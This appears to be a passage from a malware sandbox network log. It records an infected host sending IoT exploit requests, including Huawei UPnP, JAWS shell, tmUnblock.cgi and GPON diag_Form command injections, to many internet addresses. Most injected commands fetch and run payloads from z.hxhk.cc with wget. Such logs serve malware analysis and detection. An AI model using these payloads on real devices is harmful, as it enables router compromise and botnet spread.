s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g z.hxhk.cc -l /tmp/.sys64 -r sys64.mips; /bin/busybox chmod 777 * /tmp/.sys64; /tmp/.sys64 huw.s)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.23	35822	40.76.156.8	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.880834103 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.23	52370	142.197.229.125	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.920067072 CET	231	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.066881895 CET	500	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Mon, 18 Mar 2024 08:57:01 GMT Server: HTTP Server Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.23	38734	51.15.203.55	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.945610046 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.104737043 CET	495	IN	HTTP/1.1 400 Bad Request Date: Mon, 18 Mar 2024 08:57:00 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.23	37150	23.216.137.146	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.969404936 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.458524942 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.563947916 CET	430	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 208 Expires: Mon, 18 Mar 2024 08:57:00 GMT Date: Mon, 18 Mar 2024 08:57:00 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 31 35 39 63 38 31 37 26 23 34 36 3b 31 37 31 30 37 35 32 32 32 30 26 23 34 36 3b 62 37 32 38 36 65 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "[no URL]", is invalid.<p>Reference #9.d159c817.1710752220.b7286ec</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.23	53174	76.12.139.97	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.979274035 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.078897953 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:56:59 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.23	53486	94.101.224.57	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:56:59.988346100 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.190048933 CET	495	IN	HTTP/1.1 400 Bad Request Date: Mon, 18 Mar 2024 08:57:00 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.23	52628	172.65.202.91	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.067831039 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.23	52388	2.19.201.24	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.084610939 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.348047018 CET	134	IN	HTTP/1.0 301 Moved Permanently Location: https://www.oracleindustry.com/unknown Connection: close Content-Length: 0
Mar 18, 2024 09:57:00.396967888 CET	134	IN	HTTP/1.0 301 Moved Permanently Location: https://www.oracleindustry.com/unknown Connection: close Content-Length: 0
Mar 18, 2024 09:57:00.496995926 CET	134	IN	HTTP/1.0 301 Moved Permanently Location: https://www.oracleindustry.com/unknown Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.23	32846	152.70.246.154	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.100876093 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.426992893 CET	314	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 18 Mar 2024 08:57:00 GMT Content-Type: text/html Content-Length: 150 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.23	48016	83.143.132.22	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.375328064 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:00.966255903 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:01.154246092 CET	420	IN	HTTP/1.1 400 Bad Request Date: Mon, 18 Mar 2024 08:57:01 GMT Server: Apache X-SERVER: 1165 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.23	58586	137.184.115.152	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.463131905 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:01.322381020 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:01.478226900 CET	386	IN	HTTP/1.1 404 NOT FOUND Content-Length: 232 Content-Type: text/html; charset=utf-8 Date: Mon, 18 Mar 2024 08:57:01 GMT Server: waitress Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 33 2e 32 20 46 69 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.23	42894	23.219.40.85	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.463211060 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:00.969583035 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:01.132375002 CET	428	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 206 Expires: Mon, 18 Mar 2024 08:57:01 GMT Date: Mon, 18 Mar 2024 08:57:01 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 32 63 32 64 31 37 26 23 34 36 3b 31 37 31 30 37 35 32 32 32 31 26 23 34 36 3b 39 35 36 38 64 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "[no URL]", is invalid.<p>Reference #9.52c2d17.1710752221.9568db</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.23	57904	199.232.189.40	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.471703053 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:01.386384010 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:01.559520960 CET	513	IN	HTTP/1.1 500 Domain Not Found Connection: keep-alive Content-Length: 221 Server: Varnish Retry-After: 0 content-type: text/html Cache-Control: private, no-cache X-Served-By: cache-muc13920-MUC Accept-Ranges: bytes Date: Mon, 18 Mar 2024 08:57:01 GMT Via: 1.1 varnish Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 61 73 74 6c 79 20 65 72 72 6f 72 3a 20 75 6e 6b 6e 6f 77 6e 20 64 6f 6d 61 69 6e 20 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 3e 46 61 73 74 6c 79 20 65 72 72 6f 72 3a 20 75 6e 6b 6e 6f 77 6e 20 64 6f 6d 61 69 6e 3a 20 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 61 64 64 65 64 20 74 6f 20 61 20 73 65 72 76 69 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 44 65 74 61 69 6c 73 3a 20 63 61 63 68 65 2d 6d 75 63 31 33 39 32 30 2d 4d 55 43 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Fastly error: unknown domain </title></head><body><p>Fastly error: unknown domain: . Please check that this domain has been added to a service.</p><p>Details: cache-muc13920-MUC</p></body></html>
